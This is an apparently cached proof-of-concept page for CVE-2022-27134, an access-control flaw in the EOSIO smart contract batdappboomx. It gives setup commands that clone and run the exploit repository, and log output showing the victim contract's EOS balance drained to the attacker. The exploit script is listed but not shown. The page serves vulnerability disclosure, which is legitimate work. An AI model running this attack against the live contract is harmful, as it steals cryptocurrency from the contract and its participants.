Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2022-27134 PoC — batdappboomx 安全漏洞

Source
https://github.com/Kenun99/CVE-batdappboomx
Associated Vulnerability
Title:batdappboomx 安全漏洞 (CVE-2022-27134)
Description:batdappboomx是一个公共智能合约。 batdappboomx v327c04cf 版本存在安全漏洞,该漏洞源于智能合约的 transfer 函数中存在访问控制问题。远程攻击者可以通过 std::string memo 参数利用该漏洞在不支付门票费用的情况下赢得加密货币。
Description
CVE-2022-27134
Readme
## CVE ID
CVE-2022-27134

## PRODUCT
`batdappboomx` is a public smart contract running in the [EOSIO blockchain](https://eos.io/). This smart contract rewards cryptocurrency to its participants if they pay some cryptocurrency before. 


## Version
The latest version of this smart contract. The sha256 hash code of the smart contract is 1327c04cf4b56183eddb1a897bbebf5a873d3421272b708829a4ed0765bef820
Check it at the blockchain explorer https://bloks.io/account/batdappboomx.

## PROBLEM TYPE 
access control vulnerability

## DESCRIPTION

`batdappboomx` is not open-source, but we found a vulnerability with [WASAI](https://github.com/WASAIRepo/WASAI). Attackers can join in this game without paying anything. 

1. activate the environment

```bash
git clone https://github.com/Kenun99/CVE-batdappboomx.git && cd CVE-batdappboomx
docker build -t localhost/client-eos:eos .
docker run --rm  --network host -it localhost/client-eos:eos
```

2. attack the victim and steal its cryptocurrency, i.e., `EOS`

```bash
info  2022-03-11T14:28:53.345 keosd     wallet_plugin.cpp:38          plugin_initialize    ]
...
warn  2022-03-11T14:28:53.355 keosd     wallet.cpp:218                save_wallet_file     ] saving wallet to file /root/eosio-wallet/./default.wallet
Creating wallet: default
Save password to use in the future to unlock this wallet.
Without password imported keys will not be retrievable.
saving password to /root/passwd
imported private key for: EOS6MRyAjQq8ud7hVNYcfnVPJqcVpscN5So8BhtHuGYqET5GDW5CV
[+] victim's balance: 100.00 -> 0.00
[+] attacker's balance: 10000000.00 10000100.00

[+] Attacked successfully. Got more cryptocurrency.
```
File Snapshot

 [4.0K]  /data/pocs/62f4dbf2d8ccb639e0805b69c5f4c8ae38359899
├── [4.0K]  batdappboomx
│   ├── [2.7K]  batdappboomx.abi
│   └── [ 46K]  batdappboomx.wasm
├── [ 376]  Dockerfile
├── [4.0K]  eosio.token
│   ├── [ 564]  CMakeLists.txt
│   ├── [4.3K]  eosio.token.abi
│   ├── [ 17K]  eosio.token.wasm
│   ├── [4.0K]  include
│   │   └── [4.0K]  eosio.token
│   │       └── [7.0K]  eosio.token.hpp
│   ├── [4.0K]  ricardian
│   │   └── [3.6K]  eosio.token.contracts.md.in
│   └── [4.0K]  src
│       └── [5.3K]  eosio.token.cpp
├── [ 965]  genesis.json
├── [3.7K]  poc.py
└── [1.6K]  README.md

6 directories, 12 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.